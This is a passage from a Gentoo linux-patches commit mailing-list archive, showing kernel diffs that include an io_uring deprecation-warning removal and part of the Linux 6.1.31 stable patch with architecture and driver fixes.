+-	seq = TCP_SKB_CB(skb)->seq;
++	first = skb_shinfo(strp->anchor)->frag_list;
++	skb = first;
++	seq = TCP_SKB_CB(first)->seq;
+ 
++	/* Make sure there's no duplicate data in the queue,
++	 * and the decrypted status matches.
++	 */
+ 	while (skb->len < len) {
+ 		seq += skb->len;
+ 		len -= skb->len;
+@@ -331,6 +442,8 @@ static bool tls_strp_check_no_dup(struct tls_strparser *strp)
+ 
+ 		if (TCP_SKB_CB(skb)->seq != seq)
+ 			return false;
++		if (skb_cmp_decrypted(first, skb))
++			return false;
+ 	}
+ 
+ 	return true;
+@@ -411,7 +524,7 @@ static int tls_strp_read_sock(struct tls_strparser *strp)
+ 			return tls_strp_read_copy(strp, true);
+ 	}
+ 
+-	if (!tls_strp_check_no_dup(strp))
++	if (!tls_strp_check_queue_ok(strp))
+ 		return tls_strp_read_copy(strp, false);
+ 
+ 	strp->msg_ready = 1;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 70eb3bc67126d..5b19b6c53a2cb 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2552,7 +2552,7 @@ static int unix_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
+ 	struct unix_sock *u = unix_sk(sk);
+ 	struct sk_buff *skb;
+-	int err, copied;
++	int err;
+ 
+ 	mutex_lock(&u->iolock);
+ 	skb = skb_recv_datagram(sk, MSG_DONTWAIT, &err);
+@@ -2560,10 +2560,7 @@ static int unix_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ 	if (!skb)
+ 		return err;
+ 
+-	copied = recv_actor(sk, skb);
+-	kfree_skb(skb);
+-
+-	return copied;
++	return recv_actor(sk, skb);
+ }
+ 
+ /*
+diff --git a/tools/include/uapi/linux/in.h b/tools/include/uapi/linux/in.h
+index 07a4cb149305b..4b7f2df66b995 100644
+--- a/tools/include/uapi/linux/in.h
++++ b/tools/include/uapi/linux/in.h
+@@ -162,6 +162,7 @@ struct in_addr {
+ #define MCAST_MSFILTER			48
+ #define IP_MULTICAST_ALL		49
+ #define IP_UNICAST_IF			50
++#define IP_LOCAL_PORT_RANGE		51
+ 
+ #define MCAST_EXCLUDE	0
+ #define MCAST_INCLUDE	1
+diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
+index 687249d99b5f1..0465ddc81f352 100644
+--- a/tools/testing/selftests/bpf/Makefile
++++ b/tools/testing/selftests/bpf/Makefile
+@@ -193,7 +193,7 @@ $(OUTPUT)/urandom_read: urandom_read.c urandom_read_aux.c $(OUTPUT)/liburandom_r
+ 
+ $(OUTPUT)/sign-file: ../../../../scripts/sign-file.c
+ 	$(call msg,SIGN-FILE,,$@)
+-	$(Q)$(CC) $(shell $(HOSTPKG_CONFIG)--cflags libcrypto 2> /dev/null) \
++	$(Q)$(CC) $(shell $(HOSTPKG_CONFIG) --cflags libcrypto 2> /dev/null) \
+ 		  $< -o $@ \
+ 		  $(shell $(HOSTPKG_CONFIG) --libs libcrypto 2> /dev/null || echo -lcrypto)
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-02 15:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-02 15:07 UTC (permalink / raw
  To: gentoo-commits

commit:     02b803e1a984fd5e611a5146f52aef31b7a523c0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jun  2 15:07:00 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jun  2 15:07:00 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=02b803e1

io_uring: undeprecate epoll_ctl support

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                       |  4 ++++
 2100_io-uring-undeprecate-epoll-ctl-support.patch | 21 +++++++++++++++++++++
 2 files changed, 25 insertions(+)

diff --git a/0000_README b/0000_README
index 68130982..f6e14669 100644
--- a/0000_README
+++ b/0000_README
@@ -179,6 +179,10 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
+Patch:  2100_io-uring-undeprecate-epoll-ctl-support.patch
+From:   https://patchwork.kernel.org/project/io-uring/patch/20230506095502.13401-1-info@bnoordhuis.nl/
+Desc:   io_uring: undeprecate epoll_ctl support
+
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requies REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2100_io-uring-undeprecate-epoll-ctl-support.patch b/2100_io-uring-undeprecate-epoll-ctl-support.patch
new file mode 100644
index 00000000..4c3d3904
--- /dev/null
+++ b/2100_io-uring-undeprecate-epoll-ctl-support.patch
@@ -0,0 +1,21 @@
+io_uring: undeprecate epoll_ctl support
+
+---
+ io_uring/epoll.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/io_uring/epoll.c b/io_uring/epoll.c
+index 9aa74d2c80bc..89bff2068a19 100644
+--- a/io_uring/epoll.c
++++ b/io_uring/epoll.c
+@@ -25,10 +25,6 @@ int io_epoll_ctl_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ {
+ 	struct io_epoll *epoll = io_kiocb_to_cmd(req, struct io_epoll);
+ 
+-	pr_warn_once("%s: epoll_ctl support in io_uring is deprecated and will "
+-		     "be removed in a future Linux kernel version.\n",
+-		     current->comm);
+-
+ 	if (sqe->buf_index || sqe->splice_fd_in)
+ 		return -EINVAL;
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-30 16:51 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-30 16:51 UTC (permalink / raw
  To: gentoo-commits

commit:     1e67700e9800b21293786fa8561f470a0e65ba39
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue May 30 16:51:19 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue May 30 16:51:19 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1e67700e

Linux patch 6.1.31

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +-
 1030_linux-6.1.31.patch | 4442 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4444 insertions(+), 2 deletions(-)

diff --git a/0000_README b/0000_README
index 5f7fb2f0..68130982 100644
--- a/0000_README
+++ b/0000_README
@@ -159,9 +159,9 @@ Patch:  1028_linux-6.1.29.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.29
 
-Patch:  1029_linux-6.1.30.patch
+Patch:  1030_linux-6.1.31.patch
 From:   https://www.kernel.org
-Desc:   Linux 6.1.30
+Desc:   Linux 6.1.31
 
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644

diff --git a/1030_linux-6.1.31.patch b/1030_linux-6.1.31.patch
new file mode 100644
index 00000000..5f21e1ae
--- /dev/null
+++ b/1030_linux-6.1.31.patch
@@ -0,0 +1,4442 @@
+diff --git a/Documentation/devicetree/bindings/usb/cdns,usb3.yaml b/Documentation/devicetree/bindings/usb/cdns,usb3.yaml
+index dc9d6ed0781d2..5d0bfea2c087e 100644
+--- a/Documentation/devicetree/bindings/usb/cdns,usb3.yaml
++++ b/Documentation/devicetree/bindings/usb/cdns,usb3.yaml
+@@ -64,7 +64,7 @@ properties:
+     description:
+       size of memory intended as internal memory for endpoints
+       buffers expressed in KB
+-    $ref: /schemas/types.yaml#/definitions/uint32
++    $ref: /schemas/types.yaml#/definitions/uint16
+ 
+   cdns,phyrst-a-enable:
+     description: Enable resetting of PHY if Rx fail is detected
+diff --git a/Makefile b/Makefile
+index aeb58c7a4baa4..902a6b598c73b 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 30
++SUBLEVEL = 31
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx6qdl-mba6.dtsi b/arch/arm/boot/dts/imx6qdl-mba6.dtsi
+index 78555a6188510..7b7e6c2ad190c 100644
+--- a/arch/arm/boot/dts/imx6qdl-mba6.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-mba6.dtsi
+@@ -209,6 +209,7 @@
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_pcie>;
+ 	reset-gpio = <&gpio6 7 GPIO_ACTIVE_LOW>;
++	vpcie-supply = <&reg_pcie>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+index 87b5e23c766f7..d053ef302fb82 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+@@ -98,11 +98,17 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
+-		ethphy: ethernet-phy@4 {
++		ethphy: ethernet-phy@4 { /* AR8033 or ADIN1300 */
+ 			compatible = "ethernet-phy-ieee802.3-c22";
+ 			reg = <4>;
+ 			reset-gpios = <&gpio1 9 GPIO_ACTIVE_LOW>;
+ 			reset-assert-us = <10000>;
++			/*
++			 * Deassert delay:
++			 * ADIN1300 requires 5ms.
++			 * AR8033   requires 1ms.
++			 */
++			reset-deassert-us = <20000>;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm64/mm/copypage.c b/arch/arm64/mm/copypage.c
+index 6dbc822332f2a..f2fa8a0776e21 100644
+--- a/arch/arm64/mm/copypage.c
++++ b/arch/arm64/mm/copypage.c
+@@ -21,9 +21,10 @@ void copy_highpage(struct page *to, struct page *from)
+ 
+ 	copy_page(kto, kfrom);
+ 
++	if (kasan_hw_tags_enabled())
++		page_kasan_tag_reset(to);
++
+ 	if (system_supports_mte() && page_mte_tagged(from)) {
+-		if (kasan_hw_tags_enabled())
+-			page_kasan_tag_reset(to);
+ 		mte_copy_page_tags(kto, kfrom);
+ 		set_page_mte_tagged(to);
+ 	}
+diff --git a/arch/m68k/kernel/signal.c b/arch/m68k/kernel/signal.c
+index b9f6908a31bc3..ba468b5f3f0b6 100644
+--- a/arch/m68k/kernel/signal.c
++++ b/arch/m68k/kernel/signal.c
+@@ -858,11 +858,17 @@ static inline int rt_setup_ucontext(struct ucontext __user *uc, struct pt_regs *
+ }
+ 
+ static inline void __user *
+-get_sigframe(struct ksignal *ksig, size_t frame_size)
++get_sigframe(struct ksignal *ksig, struct pt_regs *tregs, size_t frame_size)
+ {
+ 	unsigned long usp = sigsp(rdusp(), ksig);
++	unsigned long gap = 0;
+ 
+-	return (void __user *)((usp - frame_size) & -8UL);
++	if (CPU_IS_020_OR_030 && tregs->format == 0xb) {
++		/* USP is unreliable so use worst-case value */
++		gap = 256;
++	}
++
++	return (void __user *)((usp - gap - frame_size) & -8UL);
+ }
+ 
+ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+@@ -880,7 +886,7 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 		return -EFAULT;
+ 	}
+ 
+-	frame = get_sigframe(ksig, sizeof(*frame) + fsize);
++	frame = get_sigframe(ksig, tregs, sizeof(*frame) + fsize);
+ 
+ 	if (fsize)
+ 		err |= copy_to_user (frame + 1, regs + 1, fsize);
+@@ -952,7 +958,7 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ 		return -EFAULT;
+ 	}
+ 
+-	frame = get_sigframe(ksig, sizeof(*frame));
++	frame = get_sigframe(ksig, tregs, sizeof(*frame));
+ 
+ 	if (fsize)
+ 		err |= copy_to_user (&frame->uc.uc_extra, regs + 1, fsize);
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index a98940e642432..67c26e81e2150 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -129,6 +129,10 @@ config PM
+ config STACKTRACE_SUPPORT
+ 	def_bool y
+ 
++config LOCKDEP_SUPPORT
++	bool
++	default y
++
+ config ISA_DMA_API
+ 	bool
+ 
+diff --git a/arch/parisc/include/asm/cacheflush.h b/arch/parisc/include/asm/cacheflush.h
+index 0bdee67241320..c8b6928cee1ee 100644
+--- a/arch/parisc/include/asm/cacheflush.h
++++ b/arch/parisc/include/asm/cacheflush.h
+@@ -48,6 +48,10 @@ void flush_dcache_page(struct page *page);
+ 
+ #define flush_dcache_mmap_lock(mapping)		xa_lock_irq(&mapping->i_pages)
+ #define flush_dcache_mmap_unlock(mapping)	xa_unlock_irq(&mapping->i_pages)
++#define flush_dcache_mmap_lock_irqsave(mapping, flags)		\
++		xa_lock_irqsave(&mapping->i_pages, flags)
++#define flush_dcache_mmap_unlock_irqrestore(mapping, flags)	\
++		xa_unlock_irqrestore(&mapping->i_pages, flags)
+ 
+ #define flush_icache_page(vma,page)	do { 		\
+ 	flush_kernel_dcache_page_addr(page_address(page)); \
+diff --git a/arch/parisc/kernel/alternative.c b/arch/parisc/kernel/alternative.c
+index 66f5672c70bd4..25c4d6c3375db 100644
+--- a/arch/parisc/kernel/alternative.c
++++ b/arch/parisc/kernel/alternative.c
+@@ -25,7 +25,7 @@ void __init_or_module apply_alternatives(struct alt_instr *start,
+ {
+ 	struct alt_instr *entry;
+ 	int index = 0, applied = 0;
+-	int num_cpus = num_online_cpus();
++	int num_cpus = num_present_cpus();
+ 	u16 cond_check;
+ 
+ 	cond_check = ALT_COND_ALWAYS |
+diff --git a/arch/parisc/kernel/cache.c b/arch/parisc/kernel/cache.c
+index 1d3b8bc8a6233..ca4a302d4365f 100644
+--- a/arch/parisc/kernel/cache.c
++++ b/arch/parisc/kernel/cache.c
+@@ -399,6 +399,7 @@ void flush_dcache_page(struct page *page)
+ 	unsigned long offset;
+ 	unsigned long addr, old_addr = 0;
+ 	unsigned long count = 0;
++	unsigned long flags;
+ 	pgoff_t pgoff;
+ 
+ 	if (mapping && !mapping_mapped(mapping)) {
+@@ -420,7 +421,7 @@ void flush_dcache_page(struct page *page)
+ 	 * to flush one address here for them all to become coherent
+ 	 * on machines that support equivalent aliasing
+ 	 */
+-	flush_dcache_mmap_lock(mapping);
++	flush_dcache_mmap_lock_irqsave(mapping, flags);
+ 	vma_interval_tree_foreach(mpnt, &mapping->i_mmap, pgoff, pgoff) {
+ 		offset = (pgoff - mpnt->vm_pgoff) << PAGE_SHIFT;
+ 		addr = mpnt->vm_start + offset;
+@@ -460,7 +461,7 @@ void flush_dcache_page(struct page *page)
+ 		}
+ 		WARN_ON(++count == 4096);
+ 	}
+-	flush_dcache_mmap_unlock(mapping);
++	flush_dcache_mmap_unlock_irqrestore(mapping, flags);
+ }
+ EXPORT_SYMBOL(flush_dcache_page);
+ 
+diff --git a/arch/parisc/kernel/process.c b/arch/parisc/kernel/process.c
+index c4f8374c7018d..b62d60009fac9 100644
+--- a/arch/parisc/kernel/process.c
++++ b/arch/parisc/kernel/process.c
+@@ -122,13 +122,18 @@ void machine_power_off(void)
+ 	/* It seems we have no way to power the system off via
+ 	 * software. The user has to press the button himself. */
+ 
+-	printk(KERN_EMERG "System shut down completed.\n"
+-	       "Please power this system off now.");
++	printk("Power off or press RETURN to reboot.\n");
+ 
+ 	/* prevent soft lockup/stalled CPU messages for endless loop. */
+ 	rcu_sysrq_start();
+ 	lockup_detector_soft_poweroff();
+-	for (;;);
++	while (1) {
++		/* reboot if user presses RETURN key */
++		if (pdc_iodc_getc() == 13) {
++			printk("Rebooting...\n");
++			machine_restart(NULL);
++		}
++	}
+ }
+ 
+ void (*pm_power_off)(void);
+diff --git a/arch/parisc/kernel/traps.c b/arch/parisc/kernel/traps.c
+index f9696fbf646c4..67b51841dc8b4 100644
+--- a/arch/parisc/kernel/traps.c
++++ b/arch/parisc/kernel/traps.c
+@@ -291,19 +291,19 @@ static void handle_break(struct pt_regs *regs)
+ 	}
+ 
+ #ifdef CONFIG_KPROBES
+-	if (unlikely(iir == PARISC_KPROBES_BREAK_INSN)) {
++	if (unlikely(iir == PARISC_KPROBES_BREAK_INSN && !user_mode(regs))) {
+ 		parisc_kprobe_break_handler(regs);
+ 		return;
+ 	}
+-	if (unlikely(iir == PARISC_KPROBES_BREAK_INSN2)) {
++	if (unlikely(iir == PARISC_KPROBES_BREAK_INSN2 && !user_mode(regs))) {
+ 		parisc_kprobe_ss_handler(regs);
+ 		return;
+ 	}
+ #endif
+ 
+ #ifdef CONFIG_KGDB
+-	if (unlikely(iir == PARISC_KGDB_COMPILED_BREAK_INSN ||
+-		iir == PARISC_KGDB_BREAK_INSN)) {
++	if (unlikely((iir == PARISC_KGDB_COMPILED_BREAK_INSN ||
++		iir == PARISC_KGDB_BREAK_INSN)) && !user_mode(regs)) {
+ 		kgdb_handle_exception(9, SIGTRAP, 0, regs);
+ 		return;
+ 	}
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index 8f371f3cbbd24..935081ddf60bc 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -5822,6 +5822,7 @@ static struct intel_uncore_type spr_uncore_mdf = {
+ };
+ 
+ #define UNCORE_SPR_NUM_UNCORE_TYPES		12
++#define UNCORE_SPR_CHA				0
+ #define UNCORE_SPR_IIO				1
+ #define UNCORE_SPR_IMC				6
+ 
+@@ -6064,12 +6065,22 @@ static int uncore_type_max_boxes(struct intel_uncore_type **types,
+ 	return max + 1;
+ }
+ 
++#define SPR_MSR_UNC_CBO_CONFIG		0x2FFE
++
+ void spr_uncore_cpu_init(void)
+ {
++	struct intel_uncore_type *type;
++	u64 num_cbo;
++
+ 	uncore_msr_uncores = uncore_get_uncores(UNCORE_ACCESS_MSR,
+ 						UNCORE_SPR_MSR_EXTRA_UNCORES,
+ 						spr_msr_uncores);
+ 
++	type = uncore_find_type_by_id(uncore_msr_uncores, UNCORE_SPR_CHA);
++	if (type) {
++		rdmsrl(SPR_MSR_UNC_CBO_CONFIG, num_cbo);
++		type->num_boxes = num_cbo;
++	}
+ 	spr_uncore_iio_free_running.num_boxes = uncore_type_max_boxes(uncore_msr_uncores, UNCORE_SPR_IIO);
+ }
+ 
+diff --git a/arch/x86/kernel/cpu/topology.c b/arch/x86/kernel/cpu/topology.c
+index 5e868b62a7c4e..0270925fe013b 100644
+--- a/arch/x86/kernel/cpu/topology.c
++++ b/arch/x86/kernel/cpu/topology.c
+@@ -79,7 +79,7 @@ int detect_extended_topology_early(struct cpuinfo_x86 *c)
+ 	 * initial apic id, which also represents 32-bit extended x2apic id.
+ 	 */
+ 	c->initial_apicid = edx;
+-	smp_num_siblings = LEVEL_MAX_SIBLINGS(ebx);
++	smp_num_siblings = max_t(int, smp_num_siblings, LEVEL_MAX_SIBLINGS(ebx));
+ #endif
+ 	return 0;
+ }
+@@ -109,7 +109,8 @@ int detect_extended_topology(struct cpuinfo_x86 *c)
+ 	 */
+ 	cpuid_count(leaf, SMT_LEVEL, &eax, &ebx, &ecx, &edx);
+ 	c->initial_apicid = edx;
+-	core_level_siblings = smp_num_siblings = LEVEL_MAX_SIBLINGS(ebx);
++	core_level_siblings = LEVEL_MAX_SIBLINGS(ebx);
++	smp_num_siblings = max_t(int, smp_num_siblings, LEVEL_MAX_SIBLINGS(ebx));
+ 	core_plus_mask_width = ht_mask_width = BITS_SHIFT_NEXT_LEVEL(eax);
+ 	die_level_siblings = LEVEL_MAX_SIBLINGS(ebx);
+ 	pkg_mask_width = die_plus_mask_width = BITS_SHIFT_NEXT_LEVEL(eax);
+diff --git a/arch/x86/kernel/dumpstack.c b/arch/x86/kernel/dumpstack.c
+index 0bf6779187dda..f18ca44c904b7 100644
+--- a/arch/x86/kernel/dumpstack.c
++++ b/arch/x86/kernel/dumpstack.c
+@@ -195,7 +195,6 @@ static void show_trace_log_lvl(struct task_struct *task, struct pt_regs *regs,
+ 	printk("%sCall Trace:\n", log_lvl);
+ 
+ 	unwind_start(&state, task, regs, stack);
+-	stack = stack ? : get_stack_pointer(task, regs);
+ 	regs = unwind_get_entry_regs(&state, &partial);
+ 
+ 	/*
+@@ -214,9 +213,13 @@ static void show_trace_log_lvl(struct task_struct *task, struct pt_regs *regs,
+ 	 * - hardirq stack
+ 	 * - entry stack
+ 	 */
+-	for ( ; stack; stack = PTR_ALIGN(stack_info.next_sp, sizeof(long))) {
++	for (stack = stack ?: get_stack_pointer(task, regs);
++	     stack;
++	     stack = stack_info.next_sp) {
+ 		const char *stack_name;
+ 
++		stack = PTR_ALIGN(stack, sizeof(long));
++
+ 		if (get_stack_info(stack, task, &stack_info, &visit_mask)) {
+ 			/*
+ 			 * We weren't on a valid stack.  It's possible that
+diff --git a/arch/x86/mm/init.c b/arch/x86/mm/init.c
+index 9121bc1b9453a..0d5ccea2538fc 100644
+--- a/arch/x86/mm/init.c
++++ b/arch/x86/mm/init.c
+@@ -9,6 +9,7 @@
+ #include <linux/sched/task.h>
+ 
+ #include <asm/set_memory.h>
++#include <asm/cpu_device_id.h>
+ #include <asm/e820/api.h>
+ #include <asm/init.h>
+ #include <asm/page.h>
+@@ -260,6 +261,24 @@ static void __init probe_page_size_mask(void)
+ 	}
+ }
+ 
++#define INTEL_MATCH(_model) { .vendor  = X86_VENDOR_INTEL,	\
++			      .family  = 6,			\
++			      .model = _model,			\
++			    }
++/*
++ * INVLPG may not properly flush Global entries
++ * on these CPUs when PCIDs are enabled.
++ */
++static const struct x86_cpu_id invlpg_miss_ids[] = {
++	INTEL_MATCH(INTEL_FAM6_ALDERLAKE   ),
++	INTEL_MATCH(INTEL_FAM6_ALDERLAKE_L ),
++	INTEL_MATCH(INTEL_FAM6_ALDERLAKE_N ),
++	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE  ),
++	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE_P),
++	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE_S),
++	{}
++};
++
+ static void setup_pcid(void)
+ {
+ 	if (!IS_ENABLED(CONFIG_X86_64))
+@@ -268,6 +287,12 @@ static void setup_pcid(void)
+ 	if (!boot_cpu_has(X86_FEATURE_PCID))
+ 		return;
+ 
++	if (x86_match_cpu(invlpg_miss_ids)) {
++		pr_info("Incomplete global flushes, disabling PCID");
++		setup_clear_cpu_cap(X86_FEATURE_PCID);
++		return;
++	}
++
+ 	if (boot_cpu_has(X86_FEATURE_PGE)) {
+ 		/*
+ 		 * This can't be cr4_set_bits_and_update_boot() -- the
+diff --git a/arch/x86/pci/xen.c b/arch/x86/pci/xen.c
+index b94f727251b64..5a4ecf0c2ac4d 100644
+--- a/arch/x86/pci/xen.c
++++ b/arch/x86/pci/xen.c
+@@ -198,7 +198,7 @@ static int xen_setup_msi_irqs(struct pci_dev *dev, int nvec, int type)
+ 		i++;
+ 	}
+ 	kfree(v);
+-	return 0;
++	return msi_device_populate_sysfs(&dev->dev);
+ 
+ error:
+ 	if (ret == -ENOSYS)
+@@ -254,7 +254,7 @@ static int xen_hvm_setup_msi_irqs(struct pci_dev *dev, int nvec, int type)
+ 		dev_dbg(&dev->dev,
+ 			"xen: msi --> pirq=%d --> irq=%d\n", pirq, irq);
+ 	}
+-	return 0;
++	return msi_device_populate_sysfs(&dev->dev);
+ 
+ error:
+ 	dev_err(&dev->dev, "Failed to create MSI%s! ret=%d!\n",
+@@ -346,7 +346,7 @@ static int xen_initdom_setup_msi_irqs(struct pci_dev *dev, int nvec, int type)
+ 		if (ret < 0)
+ 			goto out;
+ 	}
+-	ret = 0;
++	ret = msi_device_populate_sysfs(&dev->dev);
+ out:
+ 	return ret;
+ }
+@@ -393,6 +393,8 @@ static void xen_teardown_msi_irqs(struct pci_dev *dev)
+ 		for (i = 0; i < msidesc->nvec_used; i++)
+ 			xen_destroy_irq(msidesc->irq + i);
+ 	}
++
++	msi_device_destroy_sysfs(&dev->dev);
+ }
+ 
+ static void xen_pv_teardown_msi_irqs(struct pci_dev *dev)
+diff --git a/arch/xtensa/kernel/signal.c b/arch/xtensa/kernel/signal.c
+index 876d5df157ed9..5c01d7e70d90d 100644
+--- a/arch/xtensa/kernel/signal.c
++++ b/arch/xtensa/kernel/signal.c
+@@ -343,7 +343,19 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 	struct rt_sigframe *frame;
+ 	int err = 0, sig = ksig->sig;
+ 	unsigned long sp, ra, tp, ps;
++	unsigned long handler = (unsigned long)ksig->ka.sa.sa_handler;
++	unsigned long handler_fdpic_GOT = 0;
+ 	unsigned int base;
++	bool fdpic = IS_ENABLED(CONFIG_BINFMT_ELF_FDPIC) &&
++		(current->personality & FDPIC_FUNCPTRS);
++
++	if (fdpic) {
++		unsigned long __user *fdpic_func_desc =
++			(unsigned long __user *)handler;
++		if (__get_user(handler, &fdpic_func_desc[0]) ||
++		    __get_user(handler_fdpic_GOT, &fdpic_func_desc[1]))
++			return -EFAULT;
++	}
+ 
+ 	sp = regs->areg[1];
+ 
+@@ -373,20 +385,26 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 	err |= __copy_to_user(&frame->uc.uc_sigmask, set, sizeof(*set));
+ 
+ 	if (ksig->ka.sa.sa_flags & SA_RESTORER) {
+-		ra = (unsigned long)ksig->ka.sa.sa_restorer;
++		if (fdpic) {
++			unsigned long __user *fdpic_func_desc =
++				(unsigned long __user *)ksig->ka.sa.sa_restorer;
++
++			err |= __get_user(ra, fdpic_func_desc);
++		} else {
++			ra = (unsigned long)ksig->ka.sa.sa_restorer;
++		}
+ 	} else {
+ 
+ 		/* Create sys_rt_sigreturn syscall in stack frame */
+ 
+ 		err |= gen_return_code(frame->retcode);
+-
+-		if (err) {
+-			return -EFAULT;
+-		}
+ 		ra = (unsigned long) frame->retcode;
+ 	}
+ 
+-	/* 
++	if (err)
++		return -EFAULT;
++
++	/*
+ 	 * Create signal handler execution context.
+ 	 * Return context not modified until this point.
+ 	 */
+@@ -394,8 +412,7 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 	/* Set up registers for signal handler; preserve the threadptr */
+ 	tp = regs->threadptr;
+ 	ps = regs->ps;
+-	start_thread(regs, (unsigned long) ksig->ka.sa.sa_handler,
+-		     (unsigned long) frame);
++	start_thread(regs, handler, (unsigned long)frame);
+ 
+ 	/* Set up a stack frame for a call4 if userspace uses windowed ABI */
+ 	if (ps & PS_WOE_MASK) {
+@@ -413,6 +430,8 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 	regs->areg[base + 4] = (unsigned long) &frame->uc;
+ 	regs->threadptr = tp;
+ 	regs->ps = ps;
++	if (fdpic)
++		regs->areg[base + 11] = handler_fdpic_GOT;
+ 
+ 	pr_debug("SIG rt deliver (%s:%d): signal=%d sp=%p pc=%08lx\n",
+ 		 current->comm, current->pid, sig, frame, regs->pc);
+diff --git a/arch/xtensa/kernel/xtensa_ksyms.c b/arch/xtensa/kernel/xtensa_ksyms.c
+index 2a31b1ab0c9f2..17a7ef86fd0dd 100644
+--- a/arch/xtensa/kernel/xtensa_ksyms.c
++++ b/arch/xtensa/kernel/xtensa_ksyms.c
+@@ -56,6 +56,8 @@ EXPORT_SYMBOL(empty_zero_page);
+  */
+ extern long long __ashrdi3(long long, int);
+ extern long long __ashldi3(long long, int);
++extern long long __bswapdi2(long long);
++extern int __bswapsi2(int);
+ extern long long __lshrdi3(long long, int);
+ extern int __divsi3(int, int);
+ extern int __modsi3(int, int);
+@@ -66,6 +68,8 @@ extern unsigned long long __umulsidi3(unsigned int, unsigned int);
+ 
+ EXPORT_SYMBOL(__ashldi3);
+ EXPORT_SYMBOL(__ashrdi3);
++EXPORT_SYMBOL(__bswapdi2);
++EXPORT_SYMBOL(__bswapsi2);
+ EXPORT_SYMBOL(__lshrdi3);
+ EXPORT_SYMBOL(__divsi3);
+ EXPORT_SYMBOL(__modsi3);
+diff --git a/arch/xtensa/lib/Makefile b/arch/xtensa/lib/Makefile
+index 7ecef0519a27c..c9c2614188f74 100644
+--- a/arch/xtensa/lib/Makefile
++++ b/arch/xtensa/lib/Makefile
+@@ -4,7 +4,7 @@
+ #
+ 
+ lib-y	+= memcopy.o memset.o checksum.o \
+-	   ashldi3.o ashrdi3.o lshrdi3.o \
++	   ashldi3.o ashrdi3.o bswapdi2.o bswapsi2.o lshrdi3.o \
+ 	   divsi3.o udivsi3.o modsi3.o umodsi3.o mulsi3.o umulsidi3.o \
+ 	   usercopy.o strncpy_user.o strnlen_user.o
+ lib-$(CONFIG_PCI) += pci-auto.o
+diff --git a/arch/xtensa/lib/bswapdi2.S b/arch/xtensa/lib/bswapdi2.S
+new file mode 100644
+index 0000000000000..d8e52e05eba66
+--- /dev/null
++++ b/arch/xtensa/lib/bswapdi2.S
+@@ -0,0 +1,21 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later WITH GCC-exception-2.0 */
++#include <linux/linkage.h>
++#include <asm/asmmacro.h>
++#include <asm/core.h>
++
++ENTRY(__bswapdi2)
++
++	abi_entry_default
++	ssai	8
++	srli	a4, a2, 16
++	src	a4, a4, a2
++	src	a4, a4, a4
++	src	a4, a2, a4
